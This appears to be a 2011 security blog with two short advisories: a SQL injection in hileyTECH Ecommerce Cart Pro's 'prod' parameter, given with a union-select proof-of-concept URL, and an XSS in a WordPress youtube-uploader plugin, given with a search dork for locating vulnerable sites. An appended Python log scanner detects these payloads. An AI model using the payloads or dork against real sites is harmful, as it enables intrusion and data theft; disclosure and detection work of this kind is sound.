Monday, November 14, 2011

hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection

Title  : hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection
Vendor : http://www.hileytech.com
Links  : http://www.hileytech.com/cartspec.html
Type   : Web Application


The 'prod' parameter of proddetail.php in hileyTECH Ecommerce Cart Pro is vulnerable to SQL Injection.
Proof of concept:

http://localhost/proddetail.php?prod=[SQL]
http://localhost/proddetail.php?prod=-productname' union select concat(version())--+

~/p0pc0rn/~

Wednesday, November 2, 2011

Wordpress Plugin youtube-uploader Vulnerable to XSS

Title : Wordpress Plugin youtube-uploader Vulnerable to XSS
Dork  : inurl:"youtube-uploader/action.php?action="
by    : p0pc0rn


http://site.com/wp-content/plugins/youtube-uploader/action.php?action=[xss]




~/p0pc0rn/~
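As an added example (not from the advisory author or either vendor), here is a small Python detector that parses combined-format web access-log lines and flags requests whose `prod` parameter on proddetail.php or `action` parameter on youtube-uploader/action.php carries the injection or script patterns described in the two posts above. The log lines are constructed samples using documentation IP ranges, and the endpoint paths are assumed to be served from the web root.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format, not real traffic),
# modelled on the request shapes in the two advisories above.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Nov/2011:10:01:02 +0000] "GET /proddetail.php?prod=42 HTTP/1.1" 200 5120
203.0.113.5 - - [14/Nov/2011:10:01:09 +0000] "GET /proddetail.php?prod=-productname'%20union%20select%20concat(version())--+ HTTP/1.1" 200 5344
198.51.100.7 - - [02/Nov/2011:18:22:41 +0000] "GET /wp-content/plugins/youtube-uploader/action.php?action=upload HTTP/1.1" 200 880
198.51.100.7 - - [02/Nov/2011:18:22:55 +0000] "GET /wp-content/plugins/youtube-uploader/action.php?action=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 912
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoint path -> (parameter named in the advisory, pattern that indicates abuse).
# Paths are assumed to be served from the web root; adjust for your deployment.
WATCHED = {
    "/proddetail.php": (
        "prod",
        re.compile(r"(?i)\bunion\b\s+(all\s+)?\bselect\b|'\s*--|\bversion\s*\("),
    ),
    "/wp-content/plugins/youtube-uploader/action.php": (
        "action",
        re.compile(r"(?i)<\s*/?\s*script\b|\bon\w+\s*=|javascript\s*:"),
    ),
}

def check_line(line):
    """Return a finding dict if the line hits a watched endpoint with a suspicious value, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path not in WATCHED:
        return None
    param, pattern = WATCHED[url.path]
    # parse_qs percent-decodes values and turns '+' into a space, so the
    # pattern is matched against what the application would actually see.
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        if pattern.search(value):
            return {"ip": m.group("ip"), "ts": m.group("ts"), "path": url.path,
                    "param": param, "value": value}
    return None

def scan(log_text):
    """Scan a whole log body and return every finding in order."""
    return [hit for hit in map(check_line, log_text.splitlines()) if hit]
```

Running `scan(SAMPLE_LOG)` reports only the two abusive requests; the benign `prod=42` and `action=upload` lines pass through untouched.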